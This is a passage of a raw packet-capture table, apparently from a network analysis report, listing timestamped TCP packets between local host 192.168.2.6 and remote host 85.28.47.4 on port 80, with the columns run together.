                                                                Jun 27, 2024 05:58:12.311439037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311450005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311471939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311486959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311506033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311523914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311537981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311558008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311573029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311579943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311605930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311619043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311641932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311652899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311677933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311691046 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311712980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311726093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311759949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311923027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311955929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311976910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311990023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312011003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312024117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312037945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312058926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312067032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312094927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312102079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312129021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312139034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312165022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312172890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312200069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312211990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312236071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312247992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312272072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312283993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312306881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312319994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312342882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312355995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312377930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312406063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312413931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312422037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312505007 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312643051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312673092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312691927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312707901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312716007 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312742949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312755108 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312777042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312784910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312810898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312814951 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312844992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312849045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312880039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312890053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312913895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312925100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312951088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312957048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.312984943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.312998056 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313019991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313024044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313055992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313069105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313091993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313102961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313126087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313136101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313162088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313189030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313205004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313245058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313277960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313292027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313312054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313322067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313345909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313357115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313380957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313390017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313415051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313424110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313452959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313457966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313483000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313493013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313529015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313568115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313600063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313613892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313635111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313638926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313669920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313678980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313704967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313715935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313739061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313745022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313772917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.313781977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.313815117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.314682007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.314716101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.314734936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.314754009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.314768076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.314800978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.314806938 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.314835072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.314846992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.314870119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.314872980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.314904928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.314913988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.314949989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.315642118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.315694094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.315696955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.315732002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.315733910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.315772057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.315799952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.315834045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.315845013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.315867901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.315875053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.315903902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.315912008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.315943956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396558046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396631956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396683931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396708012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396718979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396753073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396774054 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396775961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396822929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396830082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396867990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396869898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396904945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396905899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396939993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396949053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.396975040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.396981955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397008896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397018909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397043943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397053003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397079945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397089005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397115946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397128105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397154093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397166014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397201061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397202015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397238970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397253036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397274971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397288084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397310019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397320986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397346973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397357941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397382975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397396088 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397417068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397429943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397452116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397464991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397486925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397497892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397522926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397536039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397569895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397815943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397850037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397867918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397883892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397893906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397918940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397933006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397953033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.397967100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.397985935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398000002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398020029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398034096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398053885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398066998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398088932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398102999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398123026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398135900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398159981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398169994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398194075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398205996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398230076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398242950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398263931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398277998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398298979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398309946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398334026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398345947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398366928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398381948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398402929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398432016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398451090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398689985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398722887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398736954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398758888 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398771048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398797035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398804903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398830891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398845911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398860931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398875952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398895025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398909092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398929119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398942947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398962975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.398977995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.398998022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399008989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399033070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399044991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399069071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399081945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399118900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399130106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399154902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399166107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399188995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399200916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399224043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399238110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399259090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399274111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399302006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399440050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399472952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399497986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399507046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399513006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399540901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399553061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399574995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399586916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399609089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399622917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399642944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399656057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399676085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399693012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399715900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399727106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399750948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399761915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399785042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399799109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399821997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399832964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399856091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.399883986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.399898052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400019884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400053978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400069952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400087118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400101900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400121927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400126934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400157928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400168896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400192976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400207043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400228024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400242090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400263071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400276899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400298119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400305986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400331020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400341988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400366068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400377035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400401115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400413036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400444984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400681019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400712967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400737047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400747061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400749922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400780916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400789976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400815964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400823116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400850058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400862932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400886059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400897980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400921106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400949955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400955915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.400969982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.400990009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401001930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401026011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401037931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401060104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401071072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401094913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401107073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401129961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401144028 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401169062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401180983 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401210070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401217937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401256084 CEST4971180192.168.2.685.28.47.4
